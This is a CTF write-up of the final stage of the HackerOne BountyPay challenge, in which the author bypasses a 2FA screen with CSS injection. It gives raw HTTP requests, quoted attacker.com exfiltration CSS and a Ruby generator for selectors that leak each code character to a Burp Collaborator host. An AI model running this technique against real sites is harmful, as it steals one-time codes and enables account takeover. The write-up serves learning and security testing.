VI - You will pay for this !

Once we are logged in using Mårten Mickos credentials we can finally see some transactions to process for the month of may.

Sadly clicking on pay does not show us the final flag but a new 2FA screen that cannot be as easily bypassed as the first one...

Let's look at the request:

POST /pay/17538771/27cd1393c170e1e97f9507a5351ea1ba HTTP/1.1
Host: app.bountypay.h1ctf.com
Connection: close
Content-Length: 73
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://app.bountypay.h1ctf.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/82.0.4079.0 Safari/537.36 autochrome/purple
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://app.bountypay.h1ctf.com/pay/17538771/27cd1393c170e1e97f9507a5351ea1ba
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: token=eyJhY2NvdW50X2lkIjoiQWU4aUpMa245eiIsImhhc2giOiIzNjE2ZDZiMmMxNWU1MGMwMjQ4YjIyNzZiNDg0ZGRiMiJ9

app_style=https%3A%2F%2Fwww.bountypay.h1ctf.com%2Fcss%2Funi_2fa_style.css

Something stands out here, there is an app_style parameter containing the URL of a CSS file: https://www.bountypay.h1ctf.com/css/uni_2fa_style.css

/**
Template for the UNI 2FA App
 */

body {
    background-color: #FFFFFF;
}

div.branding {
    height:80px;
    width:80px;
    margin:20px auto 40px auto;
    background-image:url("https://www.bountypay.h1ctf.com/images/bountypay.png");
    background-position:center center;
    background-repeat: no-repeat;
    background-size: cover;
}

... and we only have 2 minutes to send the 2FA code.

In the response we can see that the max length of the 2FA is seven characters:

<input name="challenge_answer" class="form-control" maxlength="7">

The idea here, while not really realist, is that the CSS file that is sent, is then included in the page that the 2FA app is using to generate the 2FA code. If this is true, this means that we will probably need to use a CSS injection attack to leak the 2FA code. We can confirm this by sending the request with an app_style that point to a server in our control. For this, I used Burp Collaborator:

POST /pay/17538771/27cd1393c170e1e97f9507a5351ea1ba HTTP/1.1
Host: app.bountypay.h1ctf.com
Connection: close
Content-Length: 75
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://app.bountypay.h1ctf.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/82.0.4079.0 Safari/537.36 autochrome/purple
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://app.bountypay.h1ctf.com/pay/17538771/27cd1393c170e1e97f9507a5351ea1ba
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: token=eyJhY2NvdW50X2lkIjoiQWU4aUpMa245eiIsImhhc2giOiIzNjE2ZDZiMmMxNWU1MGMwMjQ4YjIyNzZiNDg0ZGRiMiJ9

app_style=https%3A%2F%2F0stbry4if5vk4bspeq59bh6zoqugi5.burpcollaborator.net

The request was received from IP address 3.21.98.146, the same IP used by all the applications.

GET / HTTP/1.1
Host: 0stbry4if5vk4bspeq59bh6zoqugi5.burpcollaborator.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/83.0.4103.61 HeadlessChrome/83.0.4103.61 Safari/537.36
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US

The User-Agent tells us that the browser used is HeadlessChrome which is common in CTF. At this point, I had some idea on how to proceed since I knew you could exfiltrate data using CSS but there was something I was missing.

The general CSS injection data exfiltration method is to use CSS like:

/* https://medium.com/bugbountywriteup/exfiltration-via-css-injection-4e999f63097d */
input[name=csrf][value^=a]{
    background-image: url(https://attacker.com/exfil/a);
}
input[name=csrf][value^=b]{
    background-image: url(https://attacker.com/exfil/b);
}
/* ... */
input[name=csrf][value^=9]{
    background-image: url(https://attacker.com/exfil/9);   
}

Then, attacker.com would load an iframe with this css injection on it on target.com . attacker.com would then wait for a request to https://attacker.com/exfil/<data>. The iframe trick is useful since we can guess one character at a time.

In our case, we cannot do this since there is no way to iframe the app. The thing is, bruteforcing a 7 character 2FA code is not doable if the alphabet is a-zA-Z0-9 since this represent 1,028,071,702,528 combinations.

After some trials and errors I realized that there are actually 7 inputs in the page, one for each character ! This makes the challenge way easier since this requires 364 (52*7) combinations only !

I wrote a small Ruby script to generate all the combinations:

(1..7).to_a.each do |ct|
	(('a'..'z').to_a + ('0'..'9').to_a).each do |char|
		puts "input:nth-child(#{ct})[value^=\"#{char}\"] {background:url(\"http://#{ct}-#{char}.lwl3lz48tr50o2qlajeftgkff6lx9m.burpcollaborator.net\");}"
	end

	('A'..'Z').to_a.each do |char|
		puts "input:nth-child(#{ct})[value^=\"#{char}\"] {background:url(\"http://#{ct}-m#{char}.lwl3lz48tr50o2qlajeftgkff6lx9m.burpcollaborator.net\");}"
	end
end

We are using nth-child() to matches the inputs element based on their position since the first character should be the first input.

The output looks like this:

input:nth-child(6)[value^="a"] {background:url("http://1-a.vkjkf8p495807buale52hbo3musmgb.burpcollaborator.net");}
/* ... */
input:nth-child(6)[value^="z"] {background:url("http://6-z.vkjkf8p495807buale52hbo3musmgb.burpcollaborator.net");}
input:nth-child(6)[value^="0"] {background:url("http://6-0.vkjkf8p495807buale52hbo3musmgb.burpcollaborator.net");}
/* ... */
input:nth-child(6)[value^="9"] {background:url("http://6-9.vkjkf8p495807buale52hbo3musmgb.burpcollaborator.net");}
input:nth-child(6)[value^="A"] {background:url("http://6-mA.vkjkf8p495807buale52hbo3musmgb.burpcollaborator.net");}
/* ... */
input:nth-child(6)[value^="Z"] {background:url("http://6-mZ.vkjkf8p495807buale52hbo3musmgb.burpcollaborator.net");}

To host the final payload I used GitHub Gist and raw.githack.com to set the proper Content-Type headers:

app_style=<@urlencode_5>https://gist.githack.com/Techbrunch/82c3691e20a6c754a4f16e93d752cc3e/raw/837efa256058fc642443b7c59e81c7827d4a1ff4/h12006.css<@/urlencode_5>

This is how it looks like in Burp after we submit our payload (here I'm using Taborator):

Based on the requests made to the collaborator we can easily extract the 2FA code.

1-mt.vkjkf8p495807buale52hbo3musmgb.burpcollaborator.net
2-mv.vkjkf8p495807buale52hbo3musmgb.burpcollaborator.net
3-u.vkjkf8p495807buale52hbo3musmgb.burpcollaborator.net
4-7.vkjkf8p495807buale52hbo3musmgb.burpcollaborator.net
5-my.vkjkf8p495807buale52hbo3musmgb.burpcollaborator.net
6-1.vkjkf8p495807buale52hbo3musmgb.burpcollaborator.net
7-mw.vkjkf8p495807buale52hbo3musmgb.burpcollaborator.net

For this request, the 2FA code is TVu7Y1W , once submitted we get the final FLAG !

I hope you enjoyed reading this writeup, if so you can follow me on Twitter at @TechbrunchFR.